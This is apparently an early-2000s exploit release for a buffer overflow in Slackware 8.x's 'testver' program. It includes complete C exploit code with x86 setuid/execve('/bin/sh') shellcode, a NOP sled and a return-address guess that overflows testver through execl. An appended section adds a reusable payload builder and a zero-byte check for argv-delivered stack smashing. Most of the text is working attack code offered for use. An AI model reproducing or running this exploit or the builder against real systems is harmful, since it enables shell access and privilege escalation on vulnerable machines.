Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs
For Linux Slackware 8.x
There's a buffer overflow in "testver" on Slackware
8.x. If you pass an argument to testver longer than
4074 bytes it segfaults. Oops. That's plenty of room
to insert shellcode. testver is NOT setuid root. If it
was, the attached proof of concept code would give you
a root shell. Since it's not, the attached code gives
you a normal shell.
This issue was found by d4y-j4y and the attached
proof of lamerness was written by d4y-j4y.
[EMAIL PROTECTED]
Regards,
d4y-j4y
/*
Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs
For Linux Slackware 8.x
There's a buffer overflow in "testver"!!
If you pass an argument to testver longer than 4074 bytes
It segfaults. Oops. That's plenty of room to insert shellcode.
This issue was found by d4y-j4y and this exploit was written
by d4y-j4y. [EMAIL PROTECTED]
usage:
$ gcc testver_smash.c -o testver_smash
$ ./testver_smash
$
Not setuid though!!! ARgh!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>
#define BUFFER 4075   /* bytes needed to fill testver's buffer */
#define OVERSIZE 8    /* bytes of return address written past it */
/* setuid(0) followed by execve("/bin/sh"): Linux x86-32 shellcode.
   The setuid(0) only matters if testver were setuid root; it is not. */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Read the current stack pointer (x86-32 only); used as a base for
   guessing where testver's buffer will sit */
unsigned long get_sp (void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r" (sp));
    return sp;
}
int main ()
{
    char buffer [BUFFER+OVERSIZE+1];
    unsigned long sp;
    long addy;
    int offset = 300;   /* guessed distance from our stack to testver's buffer */
    int i;
    sp = get_sp ();
    addy = sp - offset;
    /* overwrite the saved return address with a guess that lands in the
       NOP sled; 4-byte writes, so this is x86-32 only */
    for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
        *(long*)&buffer[i] = addy;
    /* NOP sled, then the shellcode at the very end of the 4075-byte fill */
    memset (buffer, 0x90, BUFFER-strlen(shellcode));
    memcpy (buffer + BUFFER - strlen (shellcode), shellcode, strlen(shellcode));
    buffer[BUFFER+OVERSIZE] = '\0';
    printf ("Chung's Donut Shop\ntestver smash by d4y-j4y...\n");
    sleep(3);
    /* argv[1] is the overflow string; argv strings are NUL-terminated, so
       neither the shellcode nor the return address may contain 0x00 */
    execl ("/usr/sbin/testver", "buffer", buffer, (char *) NULL);
    return 0;
}
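The payload layout the exploit above builds inline (NOP sled, shellcode, repeated return address) as a reusable builder, added here as an example; this is not d4y-j4y's code and it executes nothing. It writes the return address byte by byte in little-endian order instead of through a `long` cast, so the layout is the same whether the builder is compiled on a 32- or 64-bit host, rejects shellcode that does not fit in the target buffer, and checks for the one thing that silently breaks an argv-delivered overflow: a zero byte in the address or shellcode, which ends the string copy before the saved return address is reached. `sample_sc`, the buffer sizes and the addresses in `main` are constructed test values, not anything taken from testver.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed sample "shellcode": four harmless bytes standing in for a real
 * payload so the layout can be checked without executing anything. */
static const uint8_t sample_sc[] = { 0x31, 0xc0, 0xcd, 0x80 };

/*
 * Lay out a classic stack-smash string:
 *
 *   [NOP sled][shellcode][return address x ret_copies][NUL]
 *
 * target_buf is the number of bytes needed to fill the target's buffer
 * (4075 in the exploit above), ret_copies how many 4-byte copies of the
 * return address to write past it. The address is written byte by byte
 * in little-endian order, so the result does not depend on the host's
 * word size. Returns the payload length excluding the NUL, or 0 if the
 * shellcode does not fit in target_buf or out is too small.
 */
size_t build_smash(uint8_t *out, size_t out_cap, size_t target_buf,
                   const uint8_t *sc, size_t sc_len,
                   uint32_t ret_addr, size_t ret_copies)
{
    size_t ret_bytes = ret_copies * sizeof(uint32_t);
    size_t total = target_buf + ret_bytes;

    if (sc_len > target_buf || total + 1 > out_cap)
        return 0;

    size_t sled = target_buf - sc_len;
    memset(out, 0x90, sled);            /* NOP sled absorbs a rough address guess */
    memcpy(out + sled, sc, sc_len);     /* shellcode ends exactly at target_buf */

    for (size_t i = 0; i < ret_copies; i++) {
        uint8_t *p = out + target_buf + i * sizeof(uint32_t);
        p[0] = (uint8_t)(ret_addr & 0xff);
        p[1] = (uint8_t)((ret_addr >> 8) & 0xff);
        p[2] = (uint8_t)((ret_addr >> 16) & 0xff);
        p[3] = (uint8_t)((ret_addr >> 24) & 0xff);
    }
    out[total] = '\0';
    return total;
}

/*
 * argv strings are C strings: a strcpy-style copy in the target stops at the
 * first zero byte, so a return address such as 0xbfff0000, or shellcode that
 * contains 0x00, truncates the payload before the saved return address is
 * overwritten. Returns the offset of the first zero byte within the first
 * len bytes, or -1 if there is none.
 */
long payload_has_nul(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    uint8_t out[64];
    /* 16-byte target buffer, two copies of a constructed address */
    size_t n = build_smash(out, sizeof out, 16, sample_sc, sizeof sample_sc,
                           0xbffffabcu, 2);
    if (n == 0)
        return 1;
    return payload_has_nul(out, n) == -1 ? 0 : 2;
}
```

The `payload_has_nul` check is the one to run before every `execl`: the original exploit computes `addy` from the live stack pointer, and an address with a zero byte is not an error, it just quietly becomes a shorter argument that never reaches the return address.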